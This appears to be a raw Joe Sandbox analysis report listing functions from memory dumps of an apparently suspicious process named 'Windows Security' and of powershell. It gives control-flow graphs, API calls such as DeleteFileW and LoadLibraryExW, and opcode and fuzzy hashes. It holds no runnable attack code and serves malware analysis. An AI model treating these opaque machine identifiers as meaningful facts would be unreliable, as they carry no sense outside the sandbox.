                                                    • Snapshot File: hcaresult_16_2_6070000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ?$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                    • API String ID: 0-1152698448
                                                    • Opcode ID: 84c933efab37bc2b95aa632776d84eb29ebe3ff3293a7c6bc537420efa562d25
                                                    • Instruction ID: 6e3978b84fd1e4672cf7d5413faa6d44b17225bfe1dca1cefd03bee79271f004
                                                    • Opcode Fuzzy Hash: 84c933efab37bc2b95aa632776d84eb29ebe3ff3293a7c6bc537420efa562d25
                                                    • Instruction Fuzzy Hash: D0F17FB0F802058FEB589FA9C944A6EBBF6FF84700F148519E4069B3A5CB75EC41CB95
                                                    Function 06070000 Relevance: 7.8, Strings: 6, Instructions: 266COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 420 6070000-607000b 421 607000c-6070014 420->421 422 6070016-6070023 421->422 423 6070025-6070041 421->423 422->423 423->421 424 6070043-6070068 423->424 425 607006f-6070071 424->425 426 6070073-6070079 425->426 427 6070089-60700bd 425->427 428 607007d-607007f 426->428 429 607007b 426->429 432 60700c0-60700c4 427->432 428->427 429->427 433 60700c6-60700cb 432->433 434 60700cd-60700d2 432->434 435 60700d8-60700db 433->435 434->435 436 6070db7-6070dc1 435->436 437 60700e1-60700f5 435->437 437->432 439 60700f7 437->439 440 6070484-6070493 439->440 441 60703a2-60703b1 439->441 442 60702c0-60702cf 439->442 443 60700fe-607010b 439->443 444 60701de-60701ed 439->444 445 6070d3f-6070d63 440->445 446 6070499-60704bf 440->446 441->445 447 60703b7-60703dd 441->447 442->445 448 60702d5-60702fb 442->448 443->445 450 6070111-6070137 443->450 444->445 449 60701f3-6070219 444->449 463 6070f32-6070f37 445->463 464 6070d69-6070d70 445->464 480 60704c1-60704c6 446->480 481 60704c8-60704cf 446->481 471 60703e6-60703ed 447->471 472 60703df-60703e4 447->472 474 6070304-607030b 448->474 475 60702fd-6070302 448->475 476 6070222-6070229 449->476 477 607021b-6070220 449->477 478 6070140-6070147 450->478 479 6070139-607013e 450->479 464->463 468 6070d76-6070d91 464->468 468->463 498 6070d97-6070d9f 468->498 482 6070413-6070437 471->482 483 60703ef-6070411 471->483 484 6070452-607047f 472->484 485 6070331-6070355 474->485 486 607030d-607032f 474->486 487 6070370-607039d 475->487 488 607024f-6070273 476->488 489 607022b-607024d 476->489 490 607028e-60702bb 477->490 491 607016d-6070191 478->491 492 6070149-607016b 478->492 493 60701ac-60701d9 479->493 497 6070534-6070561 480->497 495 60704f5-6070519 481->495 496 60704d1-60704f3 481->496 532 607044f 482->532 533 6070439-607043f 482->533 483->484 484->432 534 6070357-607035d 485->534 535 607036d 485->535 486->487 487->432 536 6070275-607027b 488->536 537 607028b 488->537 489->490 490->432 538 6070193-6070199 491->538 539 60701a9 491->539 492->493 493->432 530 6070531 495->530 531 607051b-6070521 495->531 496->497 497->432 498->463 514 6070da5-6070dae 498->514 514->436 530->497 540 6070525-6070527 531->540 541 6070523 531->541 532->484 542 6070443-6070445 533->542 543 6070441 533->543 544 6070361-6070363 534->544 545 607035f 534->545 535->487 546 607027f-6070281 536->546 547 607027d 536->547 537->490 548 607019d-607019f 538->548 549 607019b 538->549 539->493 540->530 541->530 542->532 543->532 544->535 545->535 546->537 547->537 548->539 549->539
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4537701929.0000000006070000.00000040.00000800.00020000.00000000.sdmp, Offset: 06070000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_6070000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ?$$]q$$]q$$]q$$]q$$]q
                                                    • API String ID: 0-4101917017
                                                    • Opcode ID: 18b87163e40c3ece2cc17b3a6b75e177bf2e6dec290a6e127fc7e8ba83f31255
                                                    • Instruction ID: 3ed7cf8349c85d74341917f7b84467155d097b555e1c53432c8cf36fa964e590
                                                    • Opcode Fuzzy Hash: 18b87163e40c3ece2cc17b3a6b75e177bf2e6dec290a6e127fc7e8ba83f31255
                                                    • Instruction Fuzzy Hash: B59105B0F807058FEB458B69C850BAE7FB6FF85304F144666D002DB3A2CA75ED4687A5
                                                    Function 0503A1D8 Relevance: 1.7, APIs: 1, Instructions: 202COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1243 503a1d8-503a1f7 1244 503a223-503a227 1243->1244 1245 503a1f9-503a206 call 5039184 1243->1245 1246 503a23b-503a27c 1244->1246 1247 503a229-503a233 1244->1247 1250 503a208 1245->1250 1251 503a21c 1245->1251 1254 503a289-503a297 1246->1254 1255 503a27e-503a286 1246->1255 1247->1246 1299 503a20e call 503a470 1250->1299 1300 503a20e call 503a480 1250->1300 1251->1244 1257 503a2bb-503a2bd 1254->1257 1258 503a299-503a29e 1254->1258 1255->1254 1256 503a214-503a216 1256->1251 1261 503a358-503a418 1256->1261 1262 503a2c0-503a2c7 1257->1262 1259 503a2a0-503a2a7 call 5039190 1258->1259 1260 503a2a9 1258->1260 1264 503a2ab-503a2b9 1259->1264 1260->1264 1294 503a420-503a44b GetModuleHandleW 1261->1294 1295 503a41a-503a41d 1261->1295 1265 503a2d4-503a2db 1262->1265 1266 503a2c9-503a2d1 1262->1266 1264->1262 1268 503a2e8-503a2f1 call 5033c28 1265->1268 1269 503a2dd-503a2e5 1265->1269 1266->1265 1274 503a2f3-503a2fb 1268->1274 1275 503a2fe-503a303 1268->1275 1269->1268 1274->1275 1277 503a321-503a325 1275->1277 1278 503a305-503a30c 1275->1278 1301 503a328 call 503a730 1277->1301 1302 503a328 call 503a740 1277->1302 1278->1277 1279 503a30e-503a31e call 503900c call 50391a0 1278->1279 1279->1277 1282 503a32b-503a32e 1284 503a351-503a357 1282->1284 1285 503a330-503a34e 1282->1285 1285->1284 1296 503a454-503a468 1294->1296 1297 503a44d-503a453 1294->1297 1295->1294 1297->1296 1299->1256 1300->1256 1301->1282 1302->1282
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0503A43E
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: a8c640e60b353cffa9476b26bf4206118fbb016877d27f1d4369010b666ea95b
                                                    • Instruction ID: a848261d17a7eaad990213e91c39585b0f136053a24d0e30feaa4c3b130cc171
                                                    • Opcode Fuzzy Hash: a8c640e60b353cffa9476b26bf4206118fbb016877d27f1d4369010b666ea95b
                                                    • Instruction Fuzzy Hash: 9D817970A00B058FD764DF6AE44579ABBFAFF88304F00892DE48AD7A50D779E945CB90
                                                    Function 049C3347 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1303 49c3347-49c3349 1304 49c32ef-49c3311 1303->1304 1305 49c334b-49c33c8 1303->1305 1309 49c331a-49c333b 1304->1309 1310 49c3313-49c3319 1304->1310 1308 49c33cb-49c3411 CreateActCtxA 1305->1308 1313 49c341a-49c3437 1308->1313 1314 49c3413-49c3419 1308->1314 1310->1309 1317 49c343f-49c3474 1313->1317 1314->1313 1321 49c3476-49c3479 1317->1321 1322 49c3483-49c3487 1317->1322 1321->1322 1323 49c3498-49c349c 1322->1323 1324 49c3489-49c3495 1322->1324 1329 49c349e-49c34ae 1323->1329 1330 49c3436-49c3437 1323->1330 1324->1323 1330->1317
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 049C3401
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 8a08709357dc0f76aa4e2478c5a20971444047465dc7ff9cb02115655ed26e96
                                                    • Instruction ID: d86b99ac1282831900c387e1d2d75db9a4e50e05840f887c85a440399f60f79b
                                                    • Opcode Fuzzy Hash: 8a08709357dc0f76aa4e2478c5a20971444047465dc7ff9cb02115655ed26e96
                                                    • Instruction Fuzzy Hash: 214102B1C00719CBDB25DFA9C8487DEBBF5BF48304F20846AD418AB251D779694ACF91
                                                    Function 0503C7C5 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1331 503c7c5-503c836 1333 503c841-503c848 1331->1333 1334 503c838-503c83e 1331->1334 1335 503c853-503c88b 1333->1335 1336 503c84a-503c850 1333->1336 1334->1333 1337 503c893-503c8f2 CreateWindowExW 1335->1337 1336->1335 1338 503c8f4-503c8fa 1337->1338 1339 503c8fb-503c933 1337->1339 1338->1339 1343 503c940 1339->1343 1344 503c935-503c938 1339->1344 1345 503c941 1343->1345 1344->1343 1345->1345
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0503C8E2
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 73cda8b65ce259788674085df6e7ba72112ae28d39b6804accf83b249ea2bd5f
                                                    • Instruction ID: 1e68dae52123a8e6d3918e4defaafbafdf68495b6c1abb42ff25f0c7e5036e15
                                                    • Opcode Fuzzy Hash: 73cda8b65ce259788674085df6e7ba72112ae28d39b6804accf83b249ea2bd5f
                                                    • Instruction Fuzzy Hash: E951B2B1D003099FDB14CF99D884ADEBFB5BF48310F24812AE819BB210D775A945CF90
                                                    Function 0503C7D0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1346 503c7d0-503c836 1347 503c841-503c848 1346->1347 1348 503c838-503c83e 1346->1348 1349 503c853-503c8f2 CreateWindowExW 1347->1349 1350 503c84a-503c850 1347->1350 1348->1347 1352 503c8f4-503c8fa 1349->1352 1353 503c8fb-503c933 1349->1353 1350->1349 1352->1353 1357 503c940 1353->1357 1358 503c935-503c938 1353->1358 1359 503c941 1357->1359 1358->1357 1359->1359
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0503C8E2
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: b944bb6c389742cc8255fd87bfe2ec38222b3cc01f1bf5c1cef22d75e6fe63f3
                                                    • Instruction ID: e57d53162bca323dff42f6f1c9172243095bd1a4a177fc448f2af80ecba49fd6
                                                    • Opcode Fuzzy Hash: b944bb6c389742cc8255fd87bfe2ec38222b3cc01f1bf5c1cef22d75e6fe63f3
                                                    • Instruction Fuzzy Hash: FE41B0B1D003499FDB14CF9AD884ADEBBF5BF48310F24812AE819BB210D775A985CF90
                                                    Function 0503AA1C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0503EE51
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: e4d579cb37863606ba8023ed393a49ae2c268983c5d3a0d5747ce960c8bd1a08
                                                    • Instruction ID: e4118da0e0d7c46943daa9ecec41a111f9a0983875ec8282431dac62d911aa3b
                                                    • Opcode Fuzzy Hash: e4d579cb37863606ba8023ed393a49ae2c268983c5d3a0d5747ce960c8bd1a08
                                                    • Instruction Fuzzy Hash: 6C4138B4A00305CFDB14DF99D449AAEBBF9FF88314F24C559E519A7321D374A845CBA0
                                                    Function 049C34BC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b8013c0e338e45396d57c165bac7201d0d0dbdca33dd5a22619a7e0a9ffb1e2a
                                                    • Instruction ID: c5470b927d74f3974dc7a332f82f20c2bbcd7c903328d681b76d302deda2cfa0
                                                    • Opcode Fuzzy Hash: b8013c0e338e45396d57c165bac7201d0d0dbdca33dd5a22619a7e0a9ffb1e2a
                                                    • Instruction Fuzzy Hash: D941E071C04248CFDB22DFE8C8547DDBBB1EF46314F1085AEC845AB241D77AA946CB42
                                                    Function 049C1980 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 049C3401
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: e5da61c5aed281137848e76503181837fa12ad0492e7d213aa2e95599c199984
                                                    • Instruction ID: 749c7e212426d7c90a06bc99f41007e613d0efe84a7f4da3a61f9ac4492d2381
                                                    • Opcode Fuzzy Hash: e5da61c5aed281137848e76503181837fa12ad0492e7d213aa2e95599c199984
                                                    • Instruction Fuzzy Hash: 9B41E2B0C0071DCBDB25DFA9C844B9DBBF6BF49304F20846AD808AB255DB756946CF91
                                                    Function 049CFEB0 Relevance: 1.6, APIs: 1, Instructions: 74fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,049CFDE5), ref: 049CFE68
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 993588c6c6334ef68654b1afe23677aace336da2595e59283f1585d5fed7eadf
                                                    • Instruction ID: 891b51c5bcab66d4edd161a075bc29ae0cf95fd86afd45ac6eafb6321fbd76d4
                                                    • Opcode Fuzzy Hash: 993588c6c6334ef68654b1afe23677aace336da2595e59283f1585d5fed7eadf
                                                    • Instruction Fuzzy Hash: 401129735047544FD7125B6998143EABFE6AF82314F05847AC9489B292DA28E84B87E3
                                                    Function 049CF51C Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,049CFDE5), ref: 049CFE68
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: a045bd7cf74178e1ec57197adcc0273120a4eb56da5c4cf9227f27e0a541886d
                                                    • Instruction ID: 86fc4cc0feec8882aa9dcbb7e49ad9eaec2ad4554e39c0511d7f33407aa91703
                                                    • Opcode Fuzzy Hash: a045bd7cf74178e1ec57197adcc0273120a4eb56da5c4cf9227f27e0a541886d
                                                    • Instruction Fuzzy Hash: 362133B1C0061A9BCB14DF9AC444AAEFBB5EF48720F10816AD818A7245D738A940CFE2
                                                    Function 0503A638 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0503A4B9,00000800,00000000,00000000), ref: 0503A6AA
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 4a6b4ed0c8b506872bbbcad0d52a338d89ec6051911518a95974df99a0caba20
                                                    • Instruction ID: 1e54b875adaba7b111486030559e5ce1c905d0a471c7d04e00bdeeb6c5da2f9b
                                                    • Opcode Fuzzy Hash: 4a6b4ed0c8b506872bbbcad0d52a338d89ec6051911518a95974df99a0caba20
                                                    • Instruction Fuzzy Hash: 3011E4B6D002099FDB10DF9AD844ADEFBF8EB88310F10842AE959A7210C379A545CFA5
                                                    Function 049CFDF0 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DeleteFileW.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,049CFDE5), ref: 049CFE68
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4518464899.00000000049C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_49c0000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 99218ccf29cd75eedf552a76cdde22aa5b776576fbaaad5799cd06647850b6cb
                                                    • Instruction ID: ede02459bcdaf46fff05d16610c2898564bcdba6265515ea83836714f99aa659
                                                    • Opcode Fuzzy Hash: 99218ccf29cd75eedf552a76cdde22aa5b776576fbaaad5799cd06647850b6cb
                                                    • Instruction Fuzzy Hash: BA2147B1C00659CBDB14DFAAC54879EFBB4FF48320F14812AD818B3281D338A944CFA1
                                                    Function 050391C8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0503A4B9,00000800,00000000,00000000), ref: 0503A6AA
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: ff681a2c53cc079bbcf308e0ace424c5988b9a503ea4709f6e1c78db1fe492ad
                                                    • Instruction ID: 9dc84bc74930ab4ac7c0cc35226f95c8ab5db4285f7c87dd65e9fa29e42398d5
                                                    • Opcode Fuzzy Hash: ff681a2c53cc079bbcf308e0ace424c5988b9a503ea4709f6e1c78db1fe492ad
                                                    • Instruction Fuzzy Hash: 641112B6D042088FDB10DF9AD444A9EFBF8EB88310F10842AE959A7200C379A945CFA5
                                                    Function 0503A3D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0503A43E
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 05a58b2fefb3a4e637737919fc8c505180f71921198f88ee7439660a91a98ad2
                                                    • Instruction ID: e722f5b4c00d366ccce03023d0a71c4b498b6ec6b2197c5dfe4f54f73276575c
                                                    • Opcode Fuzzy Hash: 05a58b2fefb3a4e637737919fc8c505180f71921198f88ee7439660a91a98ad2
                                                    • Instruction Fuzzy Hash: 3611E0B5D002498FDB10DF9AD448BDEFBF9EF88314F10842AD959A7210C379A545CFA1
                                                    Function 00A2D4D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4463515938.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_a2d000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6099cfa59f922f58cbdbed3520e8afb6de881ae530e8a54624a70ab09a6bdd45
                                                    • Instruction ID: 71c10f73f5bd8306493e153f909dfa88b4df1be25126916e8592b668f8e99173
                                                    • Opcode Fuzzy Hash: 6099cfa59f922f58cbdbed3520e8afb6de881ae530e8a54624a70ab09a6bdd45
                                                    • Instruction Fuzzy Hash: 20212271504204DFDB05DF18E9C0F26BFA5FB98328F208579E9090B25BC37AD856DBA2
                                                    Function 00A3D3A8 Relevance: .1, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4463952444.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_a3d000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da587ebf49400d78569dd7d2416a5c0b814cd45b1326d24635f514ec3091aaa7
                                                    • Instruction ID: af8bd104f61eeb346db19cdc32437457ce6813f965db1a8b1a93905561a797fe
                                                    • Opcode Fuzzy Hash: da587ebf49400d78569dd7d2416a5c0b814cd45b1326d24635f514ec3091aaa7
                                                    • Instruction Fuzzy Hash: D72104B5604304DFCB05DF24E5C0B26BB65FB88314F20C96DE9094B256C37AE846DB62
                                                    Function 00A2D4D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4463515938.0000000000A2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A2D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_a2d000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: c6081a4088f7c488dd053ab7341cd054bcc4437fd9657117cc269f8a063aae8f
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: 5A11D376504280CFDB16CF14D5C4B16BF72FB98314F24C6A9D9094B257C33AD85ACBA2
                                                    Function 00A3D3A3 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4463952444.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_a3d000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction ID: e17b650398fe82e0b0691e2abae2c0303ab2af4252e7e79c5ca437a5baa11088
                                                    • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                    • Instruction Fuzzy Hash: 5A119075504240DFDB05CF14D5C4B15BF72FB84314F24C6AEE9494B656C33AE84ACB62
                                                    Function 00A3D233 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4463952444.0000000000A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_a3d000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4d6d706680f1a354718e9451116aeb665d2b5e688806b10e669e5ff6fc35a46e
                                                    • Instruction ID: dcd9a79c329cc1f1dfb586c21125f4c43f333a343ee8fe2d8452591f50905e14
                                                    • Opcode Fuzzy Hash: 4d6d706680f1a354718e9451116aeb665d2b5e688806b10e669e5ff6fc35a46e
                                                    • Instruction Fuzzy Hash: A1018FB5504240DFCB04CFA4E5C4A16BFA1EF84324F28C5AEEC494F25AC23BE416CB51

                                                    Non-executed Functions

                                                    Function 05032EB8 Relevance: 6.1, APIs: 4, Instructions: 135threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 05032F46
                                                    • GetCurrentThread.KERNEL32 ref: 05032F83
                                                    • GetCurrentProcess.KERNEL32 ref: 05032FC0
                                                    • GetCurrentThreadId.KERNEL32 ref: 05033019
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 9ce6d32efa77d4232bf0207893a7428145b9f1457aadf6f11707ce46c8ff2384
                                                    • Instruction ID: f888afa557658733576b1fde0465c9ea3ce5dd164919ceddf30a54d0c6d90e11
                                                    • Opcode Fuzzy Hash: 9ce6d32efa77d4232bf0207893a7428145b9f1457aadf6f11707ce46c8ff2384
                                                    • Instruction Fuzzy Hash: 6B5146B49042498FEB04DFA9E549BDEBBF5FF49304F208469E009A7360D778A944CB65
                                                    Function 05032114 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 05032F46
                                                    • GetCurrentThread.KERNEL32 ref: 05032F83
                                                    • GetCurrentProcess.KERNEL32 ref: 05032FC0
                                                    • GetCurrentThreadId.KERNEL32 ref: 05033019
                                                    Memory Dump Source
                                                    • Source File: 00000010.00000002.4536087503.0000000005030000.00000040.00000800.00020000.00000000.sdmp, Offset: 05030000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_16_2_5030000_Windows Security.jbxd
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 322346f4115b20c4962ccd50e81eb216b13a6817b038c2548af63a2e7bf336cc
                                                    • Instruction ID: 8ba3014258d8a75c662436b5b83915b77dda2a486afda42eb6b632eb5f465ebc
                                                    • Opcode Fuzzy Hash: 322346f4115b20c4962ccd50e81eb216b13a6817b038c2548af63a2e7bf336cc
                                                    • Instruction Fuzzy Hash: 455158B4904309CFDB54DFAAE549BAEBBF5FF48304F208469E009A7360D778A944CB65

                                                    Executed Functions

                                                    Function 041CA99B Relevance: .3, Instructions: 272COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2231075719.00000000041C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041C0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_17_2_41c0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 44d078d601305d0d22ec75ead97db14dccbe3f15c710a3e47a7a76fde8d41582
                                                    • Instruction ID: ae23d0f35578cbf472d5f3815de19e552bd7e3e7fada7acfd9b052f4d67e5eca
                                                    • Opcode Fuzzy Hash: 44d078d601305d0d22ec75ead97db14dccbe3f15c710a3e47a7a76fde8d41582
